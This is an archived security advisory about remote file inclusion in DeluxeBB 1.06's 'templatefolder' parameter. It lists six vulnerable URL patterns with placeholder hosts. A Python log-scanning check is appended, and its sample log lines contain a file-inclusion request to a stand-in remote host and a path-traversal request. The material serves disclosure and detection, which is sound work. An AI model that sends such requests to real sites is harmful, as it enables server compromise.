
DeluxeBB 1.06 templatefolder Remote File Include Vulnerabilities

Secunia Research has discovered some vulnerabilities in DeluxeBB,
which can be exploited by malicious people to conduct SQL injection
attacks and compromise a vulnerable system.

1) Input passed to the "templatefolder" parameter in various scripts
isn't properly verified before it is used to include files. This can
be exploited to include arbitrary files from external and local
resources.

Examples:
http://[host]/templates/deluxe/postreply.php?templatefolder=[file]
http://[host]/templates/deluxe/posting.php?templatefolder=[file]
http://[host]/templates/deluxe/pm/newpm.php?templatefolder=[file]
http://[host]/templates/default/postreply.php?templatefolder=[file]
http://[host]/templates/default/posting.php?templatefolder=[file]
http://[host]/templates/default/pm/newpm.php?templatefolder=[file]

# milw0rm.com [2006-06-15]




Andreas Sandblad                                                                       06/15/2006
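
A detection check for the issue described above, as an added example that is not part of the original advisory or of DeluxeBB's code: it scans web-server access logs for direct requests to the listed template scripts that carry a templatefolder parameter and labels the value. The Common Log Format layout, the /forum/ install prefix, the label names and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Script paths named in the advisory, under any install prefix.
TEMPLATE_SCRIPT = re.compile(
    r"^/(?:.*/)?templates/(?:deluxe|default)/(?:pm/newpm|postreply|posting)\.php$")
# Request field of a Common Log Format line (assumed log layout).
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def classify(value):
    """Label a decoded templatefolder value (labels are this example's own)."""
    v = value.replace("\\", "/").lower()
    if re.match(r"[a-z][a-z0-9+.-]*://", v) or v.startswith("//"):
        return "url-scheme"
    if "\x00" in v or ".." in v.split("/"):
        return "traversal"
    if v.startswith("/") or re.match(r"[a-z]:/", v):
        return "absolute-path"
    return "parameter-present"

def scan(lines):
    """Return (line_number, path, label) for each flagged request."""
    hits = []
    for n, line in enumerate(lines, 1):
        m = REQUEST.search(line)
        if not m:
            continue
        target = urlsplit(m.group(1))
        if not TEMPLATE_SCRIPT.match(target.path):
            continue
        # parse_qs percent-decodes, so ..%2f is compared as ../
        values = parse_qs(target.query, keep_blank_values=True)
        for value in values.get("templatefolder", []):
            hits.append((n, target.path, classify(value)))
    return hits

# Constructed sample lines (documentation addresses, not real traffic).
SAMPLE_LOG = [
    '203.0.113.7 - - [15/Jun/2006:10:01:02 +0000] "GET /forum/templates/deluxe/'
    'postreply.php?templatefolder=http://files.example.test/inc HTTP/1.1" 200 512',
    '203.0.113.7 - - [15/Jun/2006:10:01:09 +0000] "GET /forum/templates/default/'
    'pm/newpm.php?templatefolder=..%2f..%2fconfig HTTP/1.1" 200 90',
    '198.51.100.20 - - [15/Jun/2006:10:02:00 +0000] "GET /forum/index.php HTTP/1.1" 200 4096',
    '198.51.100.20 - - [15/Jun/2006:10:02:04 +0000] "GET /forum/templates/deluxe/'
    'posting.php HTTP/1.1" 200 10',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

Only the query string is inspected, so a templatefolder value sent in a POST body does not appear in a standard access log and is not seen by this check.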

				
posted:5/24/2010